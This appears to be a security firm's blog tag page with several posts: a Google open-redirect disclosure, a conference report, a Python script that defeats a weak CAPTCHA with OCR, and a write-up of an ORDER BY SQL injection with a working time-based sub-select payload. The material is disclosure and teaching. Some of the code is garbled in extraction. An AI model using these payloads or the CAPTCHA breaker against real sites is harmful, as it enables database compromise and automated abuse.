Posts Tagged ‘Web Application Security’

Google Open Redirection Vulnerability

October 5th, 2010

A month ago, we found an Open Redirection vulnerability in Google, the vulnerability was already fixed by the vendor and we were thinking about how we could add value to the disclosure of this vulnerability. After some thinking, we thought that showing how we found the vulnerability was more interesting than the vulnerability itself, so… here we go:

After identifying Twitter’s Open Redirection Vulnerability , we thought it would be cool to find one at Google. Given that “” is huge, we used Google’s search engine and some dorks to narrow down our tests. Interestingly enough, that worked perfectly and we were able to identify vulnerabilities in the first 10 minutes of testing! The following screenshot (just click on the image to enlarge it) illustrates this step:

Google Dork used to find the vulnerability
In this link we found that by browsing:

The affected user was redirected to without any warning, allowing possible phishing attacks. The following screenshots show the complete HTTP traffic:

Burp HTTP Traffic Capture I

And the answer from the server with a new location:

Burp HTTP Traffic Capture II

Doing some other deeper tests and by using Dirbuster, we discovered that other instances/directories were also affected:

New vectors to exploit this kind of vulnerabilities are being discussed in Web security forums, depending on the browser, it might be possible to execute javascript code on the remote browser, thus changing the real risk associated to this type of vulnerabilities.

nahuel bonsai, security , , , ,

Ekoparty 2010 “Hackers go corporate”: Breakfast with CIOs, CEOs and CTOs

October 4th, 2010
A new event was organized as part of the sixth edition of the Ekoparty Security Conference: “Hackers Go Corporate”, and as usual our team was there to establish new relationships and strengthen the ones we already have with our current customers.

In the event, CIOs, CEOs and CTOs from the most important Argentinean companies shared a cup of coffee with the some of the best information security experts from around the world. The event’s objective was to close down the gap between managers and the matters that hackers talk about at the Ekoparty Security Conference.

Andrés Riancho, Bonsai’s CEO, delivered a speech called “Less buffer overflows, more SQL injections” in which he urged the audience to change the way their Web applications are developed. “Nowadays, hackers choose to attack Web applications over daemons like Apache or IIS; and the reason is very simple: Web applications of today are still developed with the same security features the 90’s” Andrés said.

To make Web applications more secure, companies need to change their obsolete development methodologies and integrate security in the software development life cycle. But how do we start? What’s the first step? According to Andrés, the road to secure code starts with performing code reviews and Web application penetration tests, training developers and QA employees in OWASP Top10 and inviting security experts to the design meetings.

andres.riancho bonsai, security , , , , , , , , ,

Breaking Weak CAPTCHA in 26 Lines of Code

February 23rd, 2010

During one of our latest engagements we found a weak CAPTCHA implementation being used in the target Web application. The assessment was being performed on-site, and after identifying this vulnerability we started to talk with the CSO about how easy it would be to break it.


The general consensus of course was “very easy”. The problem was that we were unable to find any good CAPTCHA breaking software that average joe could download and run on his computer; so I spent some minutes creating a simple Python script that returns the CAPTCHA solution for this particular implementation.

Before we dig into the script, lets analyze why this CAPTCHA is weak (might not be obvious for some readers):

  1. The letters are not rotated
  2. All letters have the same height
  3. All letters have the exact same color
  4. The letters are not deformed in any way
  5. The background noise color is the same for the whole image

Now, lets see the code that breaks this CAPTCHA:

from PIL import Image

img ='input.gif')
img = img.convert("RGBA")

pixdata = img.load()

# Clean the background noise, if color != black, then set to white.
for y in xrange(img.size[1]):
    for x in xrange(img.size[0]):
        if pixdata[x, y] != (0, 0, 0, 255):
            pixdata[x, y] = (255, 255, 255, 255)"input-black.gif", "GIF")

#   Make the image bigger (needed for OCR)
im_orig ='input-black.gif')
big = im_orig.resize((116, 56), Image.NEAREST)

ext = ".tif""input-NEAREST" + ext)

#   Perform OCR using pytesser library
from pytesser import *
image ='input-NEAREST.tif')
print image_to_string(image)

This simple script works with ~ 90% of the CAPTCHA images created using this specific implementation. Enjoy!

andres.riancho bonsai, security , , , ,

Not the average SQL Injection

July 19th, 2009

SQL Injections are one of the most common and most critical Web application vulnerabilities that can be identified during a Web Application Penetration Test. SQL injections can occur in any part of a SQL query, but they usually occur in the “where_definition” section, to clarify what I’m talking about, here’s the syntax definition for the SELECT statement for MySQL:

select_expr, ...
[INTO OUTFILE 'file_name' export_options
| INTO DUMPFILE 'file_name']
[FROM table_references
[WHERE where_definition]
[GROUP BY {col_name | expr | position}
[HAVING where_definition]
[ORDER BY {col_name | expr | position}
[ASC | DESC] , ...]
[LIMIT {[offset,] row_count | row_count OFFSET offset}]
[PROCEDURE procedure_name(argument_list)]

While performing some vulnerability research in e-commerce Web applications, Ryan Dewhurst ([email protected]) found a rather uncommon SQL Injection vector in the “col_name” section of the SELECT query, which at first looks like the average SQL Injection, but when actually trying to exploit it we discovered that it was more difficult than expected. This is the code snippet for the vulnerability, were we only control the $sort_order value:

$userlog = db_get_array("SELECT change_id, action, timestamp,
                         amount, reason FROM points_table
                         WHERE user_id = ?i ORDER BY $sort_by
                         $sort_order $limit", $user_id);

First of all, no SQL Injection tool works with this type of SQL injection. The reason is that they all assume that they are going to be injecting in the where_definition part of the query, and in this case that assumption is false. So we went back to the SELECT syntax, and we found that we had not much space to play:

[ORDER BY {col_name | expr | position}
[ASC | DESC] , ...]
[LIMIT {[offset,] row_count | row_count OFFSET offset}]
[PROCEDURE procedure_name(argument_list)]

The first idea was to use a UNION clause in order to join two different queries, the one controlled by the web application, and the other controlled by us; which seemed to be a good idea, but a flawed one also:

  • select 1,2,3 union select 4,5,6 Works perfectly.
  • select 1,2,3 order by 1 ASC union select 4,5,6 Throws an "Incorrect usage of UNION and ORDER BY error."
  • (select 1,2,3 order by 1 ASC) union (select 4,5,6) Works perfectly, but we can't add the "(" at the beginning of the query.

UNION was out of the picture.

Without even noticing that I was testing something syntactically incorrect, I tried to write a file to disk using “INTO OUTFILE”, and surprisingly enough, it worked. But the problem is that we can’t control the contents of the file, because in this particular Web application we had no control of the contents of the points_table, so once again we’re were we started because we can’t write a PHP shell to disk.

So the next step was to find a way to execute a SELECT statement after an ORDER BY, the best thing that we could find was to inject a sub-SELECT statement in the col_name section of the order by. Finally the SQL injection ended up like this:

,(SELECT BENCHMARK(1000000,MD5(1)) FROM points_table where
CURRENT_USER() like '[email protected]' limit 1)

Which makes,

SELECT change_id, action, timestamp, amount, reason FROM
       points_table WHERE user_id = i ORDER BY timestamp,
       (SELECT BENCHMARK(1000000,MD5(1)) FROM points_table
        where CURRENT_USER() like '[email protected]' limit 1)

The only problem is that this injection only works if the first SELECT statement actually has more than one row to order (this is because of MySQL performance enhancements). So to be able to exploit this particular SQL injection, we had to buy two items from the e-commerce store in order to add a couple of rows to the points_table, which would then trigger the sub-select in the order by section of the query.

The above injection can be modified to perform almost any query to the database, which leads to total e-commerce web application compromise.

The conclusion is simple: while automated tools can help is in many cases, an experienced security professional can never be replaced.

andres.riancho security ,

Web Application Security Training in Buenos Aires

June 5th, 2009

Bonsai’s information security trainings are usually delivered in-company, but after receiving numerous requests we organized our first open training where employees from different organizations can attend.

The training course is going to be delivered in four classes of three and a half hours, from 18:30 to 22:00 on Tuesdays; starting July the 14th, and is going to be delivered by Andrés Riancho.

More information about the Web Application Security Training in Buenos Aires can be found here.

andres.riancho bonsai, security, w3af , , , , , ,